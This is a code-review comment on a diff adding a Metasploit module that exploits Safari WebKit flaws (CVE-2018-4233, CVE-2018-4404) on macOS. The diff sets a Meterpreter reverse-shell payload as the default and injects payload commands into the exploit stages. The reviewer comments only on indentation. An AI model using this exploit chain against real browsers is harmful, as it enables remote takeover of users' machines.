modules/exploits/osx/browser/safari_createthis.rb

```diff
@@ -0,0 +1,466 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Safari WebKit exploit',
+      'Description'    => %q{
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'saelo' ],
+      'References'     => [
+          ['CVE', '2018-4233'],
+          ['CVE', '2018-4404'],
+          ['URL', 'https://github.com/saelo/cve-2018-4233'],
+          ['URL', 'https://github.com/saelo/pwn2own2018'],
+          ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
+        ],
+      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      'Platform'       => 'osx',
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },
+      'Targets'        => [
+          [ 'Python payload',  { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+      'DisclosureDate' => 'Mar 15 2018'))
+  end
+
+  def stage1_js
+    stage1 = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2018-4233", "stage1.bin" ))
+		js = 'var stage1 = new Uint8Array(['
+		js += Rex::Text::to_num(stage1)
+		js += ']);'
+		js += '''
+stage1.replace = function(oldVal, newVal) {
+    for (var idx = 0; idx < this.length; idx++) {
+        var found = true;
+        for (var j = idx; j < idx + 8; j++) {
+            if (this[j] != oldVal.byteAt(j - idx)) {
+                found = false;
+                break;
+            }
+        }
+        if (found)
+            break;
+    }
+    this.set(newVal.bytes(), idx);
+};
+'''
+		js
+  end
+
+  def stage2_js
+    stage2 = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2018-4404", "stage2.dylib" ))
+    payload_cmd = payload.raw
+    if target['Arch'] == ARCH_PYTHON
+      payload_cmd = "echo \"#{payload_cmd}\" | python"
+    end
+    placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')
+    stage2[placeholder_index, payload_cmd.length] = payload_cmd
+		js = 'var stage2 = new Uint8Array(['
```

Comment:
The indentation from this line until the end of the method is messed up.

It also doesn't really need to be multiple lines, although this is arguably slightly harder to read:

```ruby
  return "var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);"
```